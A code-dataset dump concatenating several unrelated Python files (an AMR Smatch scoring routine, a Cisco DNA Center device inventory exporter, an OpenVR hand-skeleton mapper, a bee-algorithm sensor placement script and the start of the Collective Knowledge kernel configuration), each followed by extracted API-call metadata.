# new node mapping after moving
new_mapping = (node_id, new_id)
# node mapping before moving
old_mapping = (node_id, old_id)
# new nodes mapping list (all node pairs)
new_mapping_list = mapping[:]
new_mapping_list[node_id] = new_id
# if this mapping is already been investigated, use saved one to avoid duplicate computing
if tuple(new_mapping_list) in match_triple_dict:
return match_triple_dict[tuple(new_mapping_list)] - match_num
gain = 0
# add the triple match incurred by new_mapping to gain
if new_mapping in weight_dict:
for key in weight_dict[new_mapping]:
if key == -1:
# instance/attribute triple match
gain += weight_dict[new_mapping][-1]
elif new_mapping_list[key[0]] == key[1]:
# relation gain incurred by new_mapping and another node pair in new_mapping_list
gain += weight_dict[new_mapping][key]
# deduct the triple match incurred by old_mapping from gain
if old_mapping in weight_dict:
for k in weight_dict[old_mapping]:
if k == -1:
gain -= weight_dict[old_mapping][-1]
elif mapping[k[0]] == k[1]:
gain -= weight_dict[old_mapping][k]
# update match number dictionary
match_triple_dict[tuple(new_mapping_list)] = match_num + gain
return gain
def swap_gain(mapping, node_id1, mapping_id1, node_id2, mapping_id2, weight_dict, match_num):
"""
Compute the triple match number gain from the swapping
Arguments:
mapping: current node mapping list
node_id1: node 1 index in AMR 1
mapping_id1: the node index in AMR 2 node 1 maps to (in the current mapping)
node_id2: node 2 index in AMR 1
mapping_id2: the node index in AMR 2 node 2 maps to (in the current mapping)
weight_dict: weight dictionary
match_num: the original matching triple number
Returns:
the gain number (might be negative)
"""
new_mapping_list = mapping[:]
# Before swapping, node_id1 maps to mapping_id1, and node_id2 maps to mapping_id2
# After swapping, node_id1 maps to mapping_id2 and node_id2 maps to mapping_id1
new_mapping_list[node_id1] = mapping_id2
new_mapping_list[node_id2] = mapping_id1
if tuple(new_mapping_list) in match_triple_dict:
return match_triple_dict[tuple(new_mapping_list)] - match_num
gain = 0
new_mapping1 = (node_id1, mapping_id2)
new_mapping2 = (node_id2, mapping_id1)
old_mapping1 = (node_id1, mapping_id1)
old_mapping2 = (node_id2, mapping_id2)
if node_id1 > node_id2:
new_mapping2 = (node_id1, mapping_id2)
new_mapping1 = (node_id2, mapping_id1)
old_mapping1 = (node_id2, mapping_id2)
old_mapping2 = (node_id1, mapping_id1)
if new_mapping1 in weight_dict:
for key in weight_dict[new_mapping1]:
if key == -1:
gain += weight_dict[new_mapping1][-1]
elif new_mapping_list[key[0]] == key[1]:
gain += weight_dict[new_mapping1][key]
if new_mapping2 in weight_dict:
for key in weight_dict[new_mapping2]:
if key == -1:
gain += weight_dict[new_mapping2][-1]
# to avoid duplicate
elif key[0] == node_id1:
continue
elif new_mapping_list[key[0]] == key[1]:
gain += weight_dict[new_mapping2][key]
if old_mapping1 in weight_dict:
for key in weight_dict[old_mapping1]:
if key == -1:
gain -= weight_dict[old_mapping1][-1]
elif mapping[key[0]] == key[1]:
gain -= weight_dict[old_mapping1][key]
if old_mapping2 in weight_dict:
for key in weight_dict[old_mapping2]:
if key == -1:
gain -= weight_dict[old_mapping2][-1]
# to avoid duplicate
elif key[0] == node_id1:
continue
elif mapping[key[0]] == key[1]:
gain -= weight_dict[old_mapping2][key]
match_triple_dict[tuple(new_mapping_list)] = match_num + gain
return gain
def get_best_gain(mapping, candidate_mappings, weight_dict, instance_len, cur_match_num):
"""
Hill-climbing method to return the best gain swap/move can get
Arguments:
mapping: current node mapping
candidate_mappings: the candidates mapping list
weight_dict: the weight dictionary
instance_len: the number of the nodes in AMR 2
cur_match_num: current triple match number
Returns:
the best gain we can get via swap/move operation
"""
largest_gain = 0
# True: using swap; False: using move
use_swap = True
# the node to be moved/swapped
node1 = None
# store the other node affected. In swap, this other node is the node swapping with node1. In move, this other
# node is the node node1 will move to.
node2 = None
# unmatched nodes in AMR 2
unmatched = set(range(instance_len))
# exclude nodes in current mapping
# get unmatched nodes
for nid in mapping:
if nid in unmatched:
unmatched.remove(nid)
for i, nid in enumerate(mapping):
# current node i in AMR 1 maps to node nid in AMR 2
for nm in unmatched:
if nm in candidate_mappings[i]:
# remap i to another unmatched node (move)
# (i, m) -> (i, nm)
if veryVerbose:
print("Remap node", i, "from ", nid, "to", nm, file=DEBUG_LOG)
mv_gain = move_gain(mapping, i, nid, nm, weight_dict, cur_match_num)
if veryVerbose:
print("Move gain:", mv_gain, file=DEBUG_LOG)
new_mapping = mapping[:]
new_mapping[i] = nm
new_match_num = compute_match(new_mapping, weight_dict)
if new_match_num != cur_match_num + mv_gain:
print(mapping, new_mapping, file=ERROR_LOG)
print("Inconsistency in computing: move gain", cur_match_num, mv_gain, new_match_num,
file=ERROR_LOG)
if mv_gain > largest_gain:
largest_gain = mv_gain
node1 = i
node2 = nm
use_swap = False
# compute swap gain
for i, m in enumerate(mapping):
for j in range(i + 1, len(mapping)):
m2 = mapping[j]
# swap operation (i, m) (j, m2) -> (i, m2) (j, m)
# j starts from i+1, to avoid duplicate swap
if veryVerbose:
print("Swap node", i, "and", j, file=DEBUG_LOG)
print("Before swapping:", i, "-", m, ",", j, "-", m2, file=DEBUG_LOG)
print(mapping, file=DEBUG_LOG)
print("After swapping:", i, "-", m2, ",", j, "-", m, file=DEBUG_LOG)
sw_gain = swap_gain(mapping, i, m, j, m2, weight_dict, cur_match_num)
if veryVerbose:
print("Swap gain:", sw_gain, file=DEBUG_LOG)
new_mapping = mapping[:]
new_mapping[i] = m2
new_mapping[j] = m
print(new_mapping, file=DEBUG_LOG)
new_match_num = compute_match(new_mapping, weight_dict)
if new_match_num != cur_match_num + sw_gain:
print(mapping, new_mapping, file=ERROR_LOG)
print("Inconsistency in computing: swap gain", cur_match_num, sw_gain, new_match_num,
file=ERROR_LOG)
if sw_gain > largest_gain:
largest_gain = sw_gain
node1 = i
node2 = j
use_swap = True
# generate a new mapping based on swap/move
cur_mapping = mapping[:]
if node1 is not None:
if use_swap:
if veryVerbose:
print("Use swap gain", file=DEBUG_LOG)
temp = cur_mapping[node1]
cur_mapping[node1] = cur_mapping[node2]
cur_mapping[node2] = temp
else:
if veryVerbose:
print("Use move gain", file=DEBUG_LOG)
cur_mapping[node1] = node2
else:
if veryVerbose:
print("no move/swap gain found", file=DEBUG_LOG)
if veryVerbose:
print("Original mapping", mapping, file=DEBUG_LOG)
print("Current mapping", cur_mapping, file=DEBUG_LOG)
return largest_gain, cur_mapping
def get_best_amr_match(cur_amr1, cur_amr2):
amr_pair = []
for i, cur_amr in (1, cur_amr1), (2, cur_amr2):
try:
amr_pair.append(amr.AMR.parse_AMR_line(cur_amr))
except Exception as e:
print("Error in parsing amr %d: %s" % (i, cur_amr), file=ERROR_LOG)
print("Please check if the AMR is ill-formatted. Ignoring remaining AMRs", file=ERROR_LOG)
print("Error message: %s" % e, file=ERROR_LOG)
amr1, amr2 = amr_pair
prefix1 = "a"
prefix2 = "b"
# Rename node to "a1", "a2", .etc
node_maps_1 = rename_node(amr1, prefix1)
# Renaming node to "b1", "b2", .etc
node_maps_2 = rename_node(amr2, prefix2)
(instance1, attributes1, relation1) = amr1.get_triples()
(instance2, attributes2, relation2) = amr2.get_triples()
# optionally turn off some of the node comparison
doinstance = doattribute = dorelation = True
(best_mapping, best_match_num) = get_best_match(instance1, attributes1, relation1,
instance2, attributes2, relation2,
prefix1, prefix2, doinstance=doinstance,
doattribute=doattribute, dorelation=dorelation)
return best_mapping, instance1, attributes1, relation1, instance2, attributes2, relation2, node_maps_1, node_maps_2
def match_pair(pair):
"""
Get the best match
Args:
pair: a pair of amrs
Returns: the best matching amr
"""
amr1, amr2 = pair
match_triple_dict.clear() # clear the matching triple dictionary
ret = get_best_amr_match(amr1, amr2)
return ret
def get_entries(fname):
"""
Get AMR entries from files
Args:
fname: path to input
Returns: original amr string with meta info and amr string without meta info
"""
with open(fname) as f:
data = f.read()
entries = []
original_entries = []
for e in data.split('\n\n'):
lines = [l.strip() for l in e.splitlines()]
lines = [l for l in lines if (l and not l.startswith('#'))]
string = ' '.join(lines)
string = string.replace('\t', ' ') # replace tabs with a space
string = re.sub(' +', ' ', string) # squeeze multiple spaces into a single
if string:
entries.append( string )
original_entries.append(e)
return original_entries, entries
def align(original_gold_entries, original_test_entries, test_entries):
"""
Align test entries with gold entries to make sure that the test entries contains the same number of AMR as the gold
entries and is kept in the same order, this allows us to run SMATCH score calculation properly
Args:
original_gold_entries: gold entries
original_test_entries: original test entries with all meta info
test_entries: test entries without meta info
Returns: alined test entries
"""
test_ids = {}
i = 0
c = 0
for g in original_test_entries:
g = penman.decode(g, model=NoOpModel())
c += duplicate_count(g)
if 'id' in g.metadata:
gid = g.metadata['id']
test_ids[gid] = i
i += 1
print(c)
align_test_entries=[]
num_triples = 0
for g in original_gold_entries:
g = penman.decode(g, model=NoOpModel())
num_triples += len(g.triples)
gid = g.metadata['id']
if gid in test_ids:
align_test_entries.append(test_entries[test_ids[gid]])
else:
# the prediction file does not contain an amr with the given gold gid, add a dummy amr
align_test_entries.append('(z0 / end-01)')
print("Average gold graph size (# triples)", num_triples/len(original_gold_entries))
return align_test_entries
def duplicate_count(g):
triples = {}
c = 0
for t in g.triples:
it = inverse(t)
if t in triples or it in triples:
triples[t] += 1
else:
triples[t] = 1
triples[it] = 1
for t, k in triples.items():
if k > 1:
c += k
return c
def inverse(t):
r = t[1]
if r.endswith('-of'):
return (t[2], r[:-3], t[0])
elif r == ':mod':
return (t[2], ':domain', t[0])
elif r == ':domain':
return (t[2], ':mod', t[0])
else:
return (t[2], r + '-of', t[0])
|
[
"penman.models.noop.NoOpModel",
"random.seed",
"amr.AMR.parse_AMR_line",
"re.sub"
] |
[((12328, 12341), 'random.seed', 'random.seed', ([], {}), '()\n', (12339, 12341), False, 'import random\n'), ((14109, 14122), 'random.seed', 'random.seed', ([], {}), '()\n', (14120, 14122), False, 'import random\n'), ((28525, 28550), 're.sub', 're.sub', (['""" +"""', '""" """', 'string'], {}), "(' +', ' ', string)\n", (28531, 28550), False, 'import re\n'), ((26422, 26453), 'amr.AMR.parse_AMR_line', 'amr.AMR.parse_AMR_line', (['cur_amr'], {}), '(cur_amr)\n', (26444, 26453), False, 'import amr\n'), ((29360, 29371), 'penman.models.noop.NoOpModel', 'NoOpModel', ([], {}), '()\n', (29369, 29371), False, 'from penman.models.noop import NoOpModel\n'), ((29646, 29657), 'penman.models.noop.NoOpModel', 'NoOpModel', ([], {}), '()\n', (29655, 29657), False, 'from penman.models.noop import NoOpModel\n')]
|
# imports
from datetime import date
import requests
import xlsxwriter
from requests.auth import HTTPBasicAuth as BasicAuth
# inputs
url = "https://sandboxdnac.cisco.com/dna/system/api/v1/auth/token"
username = "devnetuser"
password = "<PASSWORD>!"
headers = {"Content-Type": "application/json", "Accept": "application/json"}
# processing
try:
r = requests.post(url, headers=headers, auth=BasicAuth(username, password))
r.raise_for_status() # raise the exception if HTTP Status Code is NOT 200
except Exception as e:
raise SystemExit(e)
else:
print("Successfully authenticated and generated a token")
# output
token = r.json()["Token"]
# inputs
url = "https://sandboxdnac.cisco.com/dna/intent/api/v1/network-device"
headers = {"X-Auth-Token": token, **headers}
# processing
r = requests.get(url, headers=headers)
print("Received the device list facts from DNA")
# output
facts = r.json()["response"]
# the header row
header = {
"A1": "Device Hostname",
"B1": "MGMT IP Address",
"C1": "Serial Number",
"D1": "Software Version",
"E1": "Device Model",
"F1": "Device Role",
}
# create a workbook and add a worksheet
wb = xlsxwriter.Workbook(f"DNA-Devices-Facts_{date.today()}.xlsx")
ws = wb.add_worksheet("DNA Devices Facts")
# write the header in the worksheet
for cell, value in header.items():
ws.write(cell, value)
# fine tune the worksheet
ws.autofilter("A1:F1")
ws.freeze_panes(1, 2)
row, col = 1, 0
# write the facts in the worksheet
for fact in facts:
ws.write(row, col + 0, fact["hostname"])
ws.write(row, col + 1, fact["managementIpAddress"])
ws.write(row, col + 2, fact["serialNumber"])
ws.write(row, col + 3, fact["softwareVersion"])
ws.write(row, col + 4, fact["platformId"])
ws.write(row, col + 5, fact["role"])
# jump to next row
row += 1
# save the workbook
wb.close()
print("Successfully created the workbook")
print("SUCCESS")
|
[
"requests.auth.HTTPBasicAuth",
"datetime.date.today",
"requests.get"
] |
[((827, 861), 'requests.get', 'requests.get', (['url'], {'headers': 'headers'}), '(url, headers=headers)\n', (839, 861), False, 'import requests\n'), ((395, 424), 'requests.auth.HTTPBasicAuth', 'BasicAuth', (['username', 'password'], {}), '(username, password)\n', (404, 424), True, 'from requests.auth import HTTPBasicAuth as BasicAuth\n'), ((1291, 1303), 'datetime.date.today', 'date.today', ([], {}), '()\n', (1301, 1303), False, 'from datetime import date\n')]
|
from direct.actor.Actor import Actor
from .definitions import HandSkeletonBone
class HandSkeleton:
"""
Helper class that will map the skeleton received from OpenVR onto the bones of the model of the hand.
"""
def __init__(self, ovr, action, joint_map, part_name="modelRoot"):
"""
* ovr : Reference to the instance of P3DOpenVR.
* action : Handler of the action holding the bone transforms of the hand
* joint_map : Dictionary that maps the joints of the model onto the bones of the OpenVR skeleton
* part_name : Name of the root node in the model that contains the joints.
"""
self.ovr = ovr
self.action = action
self.joint_map = joint_map
self.part_name = part_name
self.control_map = {}
self.model = None
def set_model(self, model):
"""
Attach the given model to the skeleton.
* model : Instance of the model of the hand.
"""
if not isinstance(model, Actor):
model = Actor(model, copy=False)
self.model = model
self.build_control_map()
def build_control_map(self):
"""
Retrieve the control joints in the model of the hand and map them onto the bones of the skeleton.
"""
self.control_map = {}
for (joint_name, bone_index) in self.joint_map.items():
joint_control = self.model.control_joint(None, self.part_name, joint_name)
if joint_control is not None:
self.control_map[bone_index] = joint_control
else:
print("Joint '{}' not found or found multiple times".format(joint_name))
def set_default_pose(self, pose):
pass
def update(self):
"""
Retrieve the transforms for all the bone and update the linked control joints.
This method should be called each frame after the main pose update task.
"""
bone_transform_array, device_path = self.ovr.get_skeletal_bone_data(self.action)
if bone_transform_array is not None:
for (bone_index, joint_control) in self.control_map.items():
transform_mat = self.ovr.get_bone_transform_mat(bone_transform_array, bone_index)
joint_control.set_mat(transform_mat)
class DefaultLeftHandSkeleton(HandSkeleton):
"""
Helper class that will map the default model of the left hand from Valve to the bones of the skeleton.
"""
default_joint_map = {
'wrist_l': HandSkeletonBone.Wrist,
'finger_thumb_0_l': HandSkeletonBone.Thumb0,
'finger_thumb_1_l': HandSkeletonBone.Thumb1,
'finger_thumb_2_l': HandSkeletonBone.Thumb2,
'finger_thumb_l_end': HandSkeletonBone.Thumb3,
'finger_index_meta_l': HandSkeletonBone.IndexFinger0,
'finger_index_0_l': HandSkeletonBone.IndexFinger1,
'finger_index_1_l': HandSkeletonBone.IndexFinger2,
'finger_index_2_l': HandSkeletonBone.IndexFinger3,
'finger_index_l_end': HandSkeletonBone.IndexFinger4,
'finger_middle_meta_l': HandSkeletonBone.MiddleFinger0,
'finger_middle_0_l': HandSkeletonBone.MiddleFinger1,
'finger_middle_1_l': HandSkeletonBone.MiddleFinger2,
'finger_middle_2_l': HandSkeletonBone.MiddleFinger3,
'finger_middle_l_end': HandSkeletonBone.MiddleFinger4,
'finger_ring_meta_l': HandSkeletonBone.RingFinger0,
'finger_ring_0_l': HandSkeletonBone.RingFinger1,
'finger_ring_1_l': HandSkeletonBone.RingFinger2,
'finger_ring_2_l': HandSkeletonBone.RingFinger3,
'finger_ring_l_end': HandSkeletonBone.RingFinger4,
'finger_pinky_meta_l': HandSkeletonBone.PinkyFinger0,
'finger_pinky_0_l': HandSkeletonBone.PinkyFinger1,
'finger_pinky_1_l': HandSkeletonBone.PinkyFinger2,
'finger_pinky_2_l': HandSkeletonBone.PinkyFinger3,
'finger_pinky_l_end': HandSkeletonBone.PinkyFinger4
}
def __init__(self, ovr, action):
HandSkeleton.__init__(self, ovr, action, self.default_joint_map)
class DefaultRightHandSkeleton(HandSkeleton):
"""
Helper class that will map the default model of the right hand from Valve to the bones of the skeleton.
"""
default_joint_map = {
'wrist_r': HandSkeletonBone.Wrist,
'finger_thumb_0_r': HandSkeletonBone.Thumb0,
'finger_thumb_1_r': HandSkeletonBone.Thumb1,
'finger_thumb_2_r': HandSkeletonBone.Thumb2,
'finger_thumb_r_end': HandSkeletonBone.Thumb3,
'finger_index_meta_r': HandSkeletonBone.IndexFinger0,
'finger_index_0_r': HandSkeletonBone.IndexFinger1,
'finger_index_1_r': HandSkeletonBone.IndexFinger2,
'finger_index_2_r': HandSkeletonBone.IndexFinger3,
'finger_index_r_end': HandSkeletonBone.IndexFinger4,
'finger_middle_meta_r': HandSkeletonBone.MiddleFinger0,
'finger_middle_0_r': HandSkeletonBone.MiddleFinger1,
'finger_middle_1_r': HandSkeletonBone.MiddleFinger2,
'finger_middle_2_r': HandSkeletonBone.MiddleFinger3,
'finger_middle_r_end': HandSkeletonBone.MiddleFinger4,
'finger_ring_meta_r': HandSkeletonBone.RingFinger0,
'finger_ring_0_r': HandSkeletonBone.RingFinger1,
'finger_ring_1_r': HandSkeletonBone.RingFinger2,
'finger_ring_2_r': HandSkeletonBone.RingFinger3,
'finger_ring_r_end': HandSkeletonBone.RingFinger4,
'finger_pinky_meta_r': HandSkeletonBone.PinkyFinger0,
'finger_pinky_0_r': HandSkeletonBone.PinkyFinger1,
'finger_pinky_1_r': HandSkeletonBone.PinkyFinger2,
'finger_pinky_2_r': HandSkeletonBone.PinkyFinger3,
'finger_pinky_r_end': HandSkeletonBone.PinkyFinger4
}
def __init__(self, ovr, action):
HandSkeleton.__init__(self, ovr, action, self.default_joint_map)
|
[
"direct.actor.Actor.Actor"
] |
[((1046, 1070), 'direct.actor.Actor.Actor', 'Actor', (['model'], {'copy': '(False)'}), '(model, copy=False)\n', (1051, 1070), False, 'from direct.actor.Actor import Actor\n')]
|
from django.contrib import admin
from .models import Timer
class TimerAdmin(admin.ModelAdmin):
list_display =('datetime', 'user', 'event', 'item_pk',
'item_name', 'other_info', 'referrer')
list_per_page = 1000
admin.site.register(Timer, TimerAdmin)
|
[
"django.contrib.admin.site.register"
] |
[((239, 277), 'django.contrib.admin.site.register', 'admin.site.register', (['Timer', 'TimerAdmin'], {}), '(Timer, TimerAdmin)\n', (258, 277), False, 'from django.contrib import admin\n')]
|
#!/usr/bin/env python3
"""Runs tablegen."""
import subprocess
import sys
# Prefix with ./ to run built binary, not arbitrary stuff from PATH.
sys.exit(subprocess.call(['./' + sys.argv[1]] + sys.argv[2:]))
|
[
"subprocess.call"
] |
[((153, 205), 'subprocess.call', 'subprocess.call', (["(['./' + sys.argv[1]] + sys.argv[2:])"], {}), "(['./' + sys.argv[1]] + sys.argv[2:])\n", (168, 205), False, 'import subprocess\n')]
|
from collections import namedtuple
from random import randrange, choice, random
from copy import deepcopy
SensorState = namedtuple('SensorState', 'terrain, sensors, coverage')
# Functions for the sensors #
def get_covered_signal_points(state: SensorState, sensor: int) -> list:
covered = get_all_covered_points(state, sensor)
return [(x, y) for x, y in covered if state.terrain[x][y] == 1]
def get_all_covered_points(state: SensorState, sensor: int) -> list:
current_sensor = state.sensors[sensor]
current_coverage = state.coverage[sensor]
covered_points = []
max_rows = len(state.terrain)
max_columns = len(state.terrain[0])
for i in range(current_coverage):
current_row = current_sensor[0] + i
if current_row <= max_rows - 1:
for j in range(current_coverage):
current_column = current_sensor[1] + j
if current_column <= max_columns - 1:
covered_points.append((current_row, current_column))
return covered_points
def get_possible_actions(state: SensorState, sensor: int) -> list:
actions = []
current_sensor = state.sensors[sensor]
max_rows = len(state.terrain)
max_columns = len(state.terrain[0])
# Left
if current_sensor[1] > 0:
actions.append((current_sensor[0], current_sensor[1] - 1))
# Right
if current_sensor[1] < (max_columns - 1):
actions.append((current_sensor[0], current_sensor[1] + 1))
# Up
if current_sensor[0] > 0:
actions.append((current_sensor[0] - 1, current_sensor[1]))
# Down
if current_sensor[0] < (max_rows - 1):
actions.append((current_sensor[0] + 1, current_sensor[1]))
return actions
def print_coverage(state: SensorState) -> None:
to_print = state.terrain.copy()
to_print = [['-' if element == 1 else 'X' for element in row] for row in to_print]
print_terrain(to_print)
for i in range(len(state.sensors)):
covered_points = get_all_covered_points(state, i)
for index, tup in enumerate(covered_points):
to_print[tup[0]][tup[1]] = '#' if to_print[tup[0]][tup[1]] == 'X' else i
print("\n")
print_terrain(to_print)
def print_terrain(terrain):
print("", end=" ")
for i in range(len(terrain[0])):
print(i, end=" ")
print("")
for i in range(len(terrain)):
print(i, end=" ")
for j in range(len(terrain[i])):
print(terrain[i][j], end=" ")
print("")
# Functions for the bee algorithm #
def objective_function(state):
coverage = set()
for i in range(len(state.sensors)):
coverage.update(get_covered_signal_points(state, i))
return len(coverage)
def create_random_bee(search_space: tuple) -> dict:
"""create a random bee position"""
positions = [(randrange(len(search_space[0])), randrange(len(search_space[0][0])))
for _ in range(len(search_space[1]))]
return {'state': SensorState(terrain=search_space[0], coverage=search_space[1], sensors=positions), 'fitness': None}
def create_neigh_bee(state: SensorState, patch_size, search_space):
"""create a bee inside a neighborhood"""
positions = deepcopy(state.sensors)
possible_modifications = [i for i in range(len(positions))]
for _ in range(patch_size):
to_modify = choice(possible_modifications)
actions = get_possible_actions(state, to_modify)
positions[to_modify] = choice(actions)
possible_modifications.remove(to_modify)
return {'state': SensorState(terrain=search_space[0], coverage=search_space[1], sensors=positions), 'fitness': None}
def search_neigh(parent, neigh_size, patch_size, search_space):
"""search inside the neighborhood of a site"""
neigh = []
for i in range(neigh_size):
bee = create_neigh_bee(parent['state'], patch_size, search_space)
bee['fitness'] = objective_function(bee['state'])
neigh.append(bee)
neigh.sort(key=lambda b: b['fitness'], reverse=True)
return neigh[0]
def create_scout_bees(search_space, num_scouts):
"""creates scout bees for new sites"""
return [create_random_bee(search_space) for _ in range(num_scouts)]
def bees_algorithm(max_gens, search_space, num_bees, num_sites,
elite_sites, patch_size, patch_dec, e_bees, o_bees):
"""implements the Bees algorithm"""
best = None
pop = [create_random_bee(search_space) for _ in range(num_bees)]
for gen in range(max_gens):
for bee in range(num_bees):
pop[bee]['fitness'] = objective_function(pop[bee]['state'])
pop.sort(key=lambda b: b['fitness'], reverse=True)
if not best or pop[0]['fitness'] > best['fitness']:
best = pop[0]
print("Now the best is {}".format(pop[0]['state'].sensors))
next_gen = []
for i, parent in enumerate(pop[:num_sites]):
neigh_size = e_bees if i < elite_sites else o_bees
next_gen.append(search_neigh(parent, neigh_size, patch_size,
search_space))
scouts = create_scout_bees(search_space, num_bees - num_sites)
pop = next_gen + scouts
if patch_dec > random():
patch_size = patch_size - 1
print(" > it=%d, patch_size=%g, f=%g" % (gen + 1, patch_size, best['fitness']))
return best
# problem configuration
terr = [[1, 1, 0, 0, 1, 0],
[1, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 1, 1, 1],
[1, 1, 1, 1, 0, 0]]
cov = [3, 2, 2, 1] # domains
search_space = (terr, cov)
# algorithm configuration
max_gens = 20 # maximum number of generations
num_bees = 45 # bees working
num_sites = 3 #
elite_sites = 1
patch_size = 3
patch_dec = 0.05 # decrease of patch size in each generation
e_bees = 7 # number of elite bees
o_bees = 2 # number of other bees
# execute the algorithm
result = bees_algorithm(max_gens, search_space, num_bees, num_sites,
elite_sites, patch_size, patch_dec, e_bees, o_bees)
print("Best result is {} with value of {}".format(result["state"].sensors, result["fitness"]))
print_coverage(result["state"])
|
[
"random.random",
"copy.deepcopy",
"random.choice",
"collections.namedtuple"
] |
[((121, 176), 'collections.namedtuple', 'namedtuple', (['"""SensorState"""', '"""terrain, sensors, coverage"""'], {}), "('SensorState', 'terrain, sensors, coverage')\n", (131, 176), False, 'from collections import namedtuple\n'), ((3198, 3221), 'copy.deepcopy', 'deepcopy', (['state.sensors'], {}), '(state.sensors)\n', (3206, 3221), False, 'from copy import deepcopy\n'), ((3338, 3368), 'random.choice', 'choice', (['possible_modifications'], {}), '(possible_modifications)\n', (3344, 3368), False, 'from random import randrange, choice, random\n'), ((3457, 3472), 'random.choice', 'choice', (['actions'], {}), '(actions)\n', (3463, 3472), False, 'from random import randrange, choice, random\n'), ((5222, 5230), 'random.random', 'random', ([], {}), '()\n', (5228, 5230), False, 'from random import randrange, choice, random\n')]
|
#
# Collective Knowledge (CK)
#
# See CK LICENSE.txt for licensing details
# See CK COPYRIGHT.txt for copyright details
#
# Developer: <NAME>
#
# This is the kernel of CK. It is implemented in just one file
# with a minimal set of common portable functions and without OO
# to make it simpler to re-implement it in any another language if needed.
# For example, we implemented some functions in Java, C, C++ and Fortran
# (see our xOpenME library used in Android)
__version__ = "1.12.3.3" # We use 3 digits for the main (released) version and 4th digit for development revision
# Do not use characters (to detect outdated version)!
# Extra modules global for the whole kernel
import sys
import json
import os
import imp # Loading Python modules
initialized=False # True if initialized
allow_print=True # Needed to suppress all output
con_encoding='' # Use non-default console encoding
# This configuration dictionary will be overloaded at run-time
# from the CK entry default:kernel:default (from this CK distro)
# and then from the local:kernel:default (from a local user repository)
cfg={
"name":"Collective Knowledge",
"desc":"exposing ad-hoc experimental setups to extensible repository and big data predictive analytics",
"cmd":"ck <action> $#module_uoa#$ (cid1/uid1) (cid2/uid2) (cid3/uid3) key_i=value_i ... @file.json",
"wiki_data_web":"https://cKnowledge.io/c/", # Collective Knowledge Base (ckb)
"private_wiki_data_web":"https://github.com/ctuning/ck/wiki/ckb_", # Collective Knowledge Base (ckb)
"api_web":"https://cKnowledge.io/c/module/",
"status_url":"https://raw.githubusercontent.com/ctuning/ck/master/setup.py",
"help_examples":" Example of obtaining, compiling and running a shared benchmark on Linux with GCC:\n $ ck pull repo:ctuning-programs\n $ ck compile program:cbench-automotive-susan --speed\n $ ck run program:cbench-automotive-susan\n\n Example of an interactive CK-powered article:\n http://cknowledge.org/repo\n",
"help_web":" Documentation:\n https://github.com/ctuning/ck/wiki",
"ck_web":"https://github.com/ctuning/ck",
"ck_web_wiki":"https://github.com/ctuning/ck/wiki",
"default_shared_repo_url":"https://github.com/ctuning",
"github_repo_url":"https://github.com",
# "default_license":"See CK LICENSE.txt for licensing details",
# "default_copyright":"See CK COPYRIGHT.txt for copyright details",
# "default_developer":"cTuning foundation",
# "default_developer_email":"<EMAIL>",
# "default_developer_webpage":"http://cTuning.org",
"detect_cur_cid":"#",
"detect_cur_cid1":"^",
"error":"CK error: ",
"json_sep":"*** ### --- CK JSON SEPARATOR --- ### ***",
"default_module":"data",
"module_name":"module",
"module_uids":["032630d041b4fd8a"],
"repo_name":"repo",
"module_code_name":"module",
"module_full_code_name":"module.py",
"env_key_root":"CK_ROOT",
"env_key_local_repo":"CK_LOCAL_REPO",
"env_key_local_kernel_uoa":"CK_LOCAL_KERNEL_UOA",
"env_key_default_repo":"CK_DEFAULT_REPO",
"env_key_repos":"CK_REPOS",
"subdir_default_repos":"repos",
"user_home_dir_ext":"CK", # if no path to repos is defined, use user home dir with this extension
"kernel_dir":"ck",
"kernel_dirs":["ck",""],
"file_kernel_py":"ck/kernel.py",
"subdir_default_repo":"repo",
"subdir_kernel":"kernel",
"subdir_kernel_default":"default",
"subdir_ck_ext":".cm", # keep compatibility with Collective Mind V1.x
"file_for_lock":"ck_lock.txt",
"special_directories":[".cm", ".svn", ".git"], # special directories that should be ignored when copying/moving entries
"ignore_directories_when_archive_repo":[".svn", ".git"],
"file_meta_old":"data.json", # keep compatibility with Collective Mind V1.x
"file_meta":"meta.json",
"file_info":"info.json",
"file_desc":"desc.json",
"file_updates":"updates.json",
"file_alias_a": "alias-a-",
"file_alias_u": "alias-u-",
"linux_sudo":"sudo",
"install_ck_as_lib":"python setup.py install",
"repo_file":".ckr.json",
"file_cache_repo_uoa":".ck.cache_repo_uoa.json",
"file_cache_repo_info":".ck.cache_repo_info.json",
"default_host":"localhost",
"default_port":"3344",
"detached_console":{"win":{"cmd":"start $#cmd#$", "use_create_new_console_flag":"yes"},
"linux":{"cmd":"xterm -hold -e \"$#cmd#$\""}},
"batch_extension":{"win":".bat",
"linux":".sh"},
"default_archive_name":"ck-archive.zip",
# TODO: remove "http://"?
"index_host":"http://localhost",
"index_port":"9200",
"index_use_curl":"no",
"cknowledge_api":"https://cKnowledge.io/api/v1/?",
# "download_missing_components":"yes",
"check_missing_modules":"yes",
"wfe_template":"default",
"module_repo_name":"repo",
"repo_name_default":"default",
"repo_uid_default":"604419a9fcc7a081",
"repo_name_local":"local",
"repo_uid_local":"9a3280b14a4285c9",
"default_exchange_repo_uoa":"remote-ck",
"default_exchange_subrepo_uoa":"upload",
"external_editor":{"win":"wordpad $#filename#$",
"linux":"vim $#filename#$"},
"shell":{"linux":{
"redirect_stdout":">",
"env_separator": ";"
},
"win": {
"redirect_stdout":">",
"env_separator": "&&"
}
},
"forbid_global_delete": "no",
"forbid_global_writing": "no",
"forbid_writing_modules": "no",
"forbid_writing_to_default_repo": "no",
"forbid_writing_to_local_repo": "no",
"allow_writing_only_to_allowed": "no",
"allow_run_only_from_allowed_repos": "no",
"repo_uids_to_allow_run":["604419a9fcc7a081",
"9a3280b14a4285c9",
"76c4424a1473c873",
"a4328ba99679e0d1",
"7fd7e76e13f4cd6a",
"215d441c19db1fed",
"<KEY>"],
"use_indexing": "no",
"internal_keys": [
"action",
"repo_uoa",
"module_uoa",
"data_uoa",
"cid",
"cids",
"cid1",
"cid2",
"cid3",
"xcids",
"unparsed_cmd",
"con_encoding",
"ck_profile",
"out",
"out_file"
],
"repo_types":{
"git":{
"clone":"git clone $#url#$ $#path#$",
"pull":"git pull",
"push":"git push",
"add":"git add $#files#$",
"rm":"git rm -rf $#files#$",
"commit":"git commit *",
"version":"git --version",
"checkout":"git checkout $#id#$"
}
},
"actions":{
"uid":{"desc":"generate UID", "for_web": "yes"},
"version":{"desc":"print CK version", "for_web": "yes"},
"python_version":{"desc":"print python version used by CK", "for_web": "no"},
"status":{"desc":"check CK version status", "for_web": "yes"},
